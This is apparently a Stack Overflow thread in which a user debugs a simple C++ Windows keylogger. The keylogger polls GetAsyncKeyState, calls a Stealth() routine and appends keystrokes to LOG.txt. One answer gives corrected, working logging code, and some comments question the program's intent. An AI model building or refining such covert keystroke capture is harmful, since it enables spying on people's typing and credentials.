# c++ keylogger not working correct

Tags: c++, windows, winapi, file-io, keylogger

I've been a visitor of stackoverflow for quite some time and this is my first question on this site :)
I'm trying to write a keylogger which will save the keys pressed in a .txt file but the problem is this. I check the outputs on cmd.exe with cout and I see that it works fine but when I open the LOG.txt file I see that the program prints abcdefgh as 012345678. Only these noncapital letters don't work. Every other key is printed correctly inside the file.
Here is my main function:

```
int main()
{
Stealth();
//Focus();
char i;
while (1)
{
    for(i = 8; i <= 255; i++){      
        if (GetAsyncKeyState(i) == -32767){     
            i=_getch();
            cout << i << endl;
            Save(i,"LOG.txt");
        }
    }
}
system("pause");
return 0;
}
```

Save function:

```
int Save(int key, char *file)
{   
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
*(determining special conditions like ENTER,SPACE...)*
*...*
*...*
else
fprintf(OUTPUT_FILE, "%s", &key);
fclose(OUTPUT_FILE);
return 0;
}
```

Comment: The thought of your program's intentions scare me a bit.... Having said that, really interesting topic. +1

Comment: `fprintf(OUTPUT_FILE, "%s", &key);` looks all sorts of wrong since key is an int.  You probably want `%c` and no `&`.

Comment: Looks like you stole the code from this question?  http://stackoverflow.com/questions/29200195/c-keylogger-wont-save-to-log-txt

Comment: @BenVoigt no, i did not. i saw that question though.

Comment: I think there might be a tutorial online somewhere for a keylogger like this. Here is another question with similar code: http://stackoverflow.com/questions/15392731/c-simple-keylogger?rq=1

Comment: Your code is correct. Check "determining special conditions" part of your Save function - most likely something is happening there.

Comment: @Isso You made me check the values of `VK_NUMPAD0...9` because that is the only place I use those numbers in the code and suprisingly their hex value corresponds to the decimal value of `noncapital a-h`. I never thought this could be the problem, thank you!!

Comment: For real? He's trying to write a keylogger and you guys help him?

Comment: @Pilpel well, I'm not going to use this for bad things. In fact, I'm getting to know more of windows api functions as I keep developing this

Answer (score 2, accepted):

I see one thing wrong wrong so far, and a couple things I would do differently. First, I don't think I would make it open and close the file every time it writes a single character.

Second (the wrong wrong), is you call `fprintf` specifying a string `%s` and giving it a integer pointer `&key`. An easy fix should be `fprintf(OUTPUT_FILE, "%c", (char)key)`, although much more elegant solutions exist for putting a single character ie `putc`.

Comment: i tried but it did not do the trick. it is just weird that only problem is from a to h

Comment: You don't need to cast `key` to `char`, because `%c` actually expects an integer value, it just interprets it as a character. In fact a char argument in a variadic function will be promoted to `int`.

Comment: @rodrigo In either case, a pointer to an integer is not a character, nor in this case a valid string.

Answer (score 0):

IMHO, you have one major problem in this code : you use `i` as a loop index, and change its value in the loop.

The other problem is that your `Save` function is plain wrong.

On my own box, the following code displays correctly the pressed keys, and logs them to file `LOG.txt` :

```
int Save(int key, char *file)
{   
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a");
fprintf(OUTPUT_FILE, " %c (%02x)", key, key);
fclose(OUTPUT_FILE);
return 0;
}

int main()
{
//Stealth();
//Focus();
char i;

// truncate log file
fd = fopen("LOG.txt", "w");
fclose(fd);
while (1)
{
    for(i = 8; i <= 255; i++){      
        if (GetAsyncKeyState(i) == -32767){     
            //i=_getch();
            cout << i << endl;
            Save(i,"LOG.txt");
        }
    }
}
// system("pause"); never used ...
return 0;
}
```

Of course, I have to press Ctrl-C or Ctrl-Break to stop the program, and non alphanumeric keys show weird symbols ...

But when I enter ABCDEFGH012345678 and then Ctrl-C (not using keypad for numbers), I get as expected in LOG.txt :

> A (41) B (42) C (43) D (44) E (45) F (46) G (47) H (48) 0 (30) 1 (31) 2 (32) 3 (33) 4 (34) 5 (35) 6 (36) 7 (37) 8 (38) . (11)

Last character represented is the Ctrl that is here a dot `.` but in reality is a square ...

Comment: That way the program prints capital letters for me even if capslock is off but thanks for the file opening idea thats much better than what I did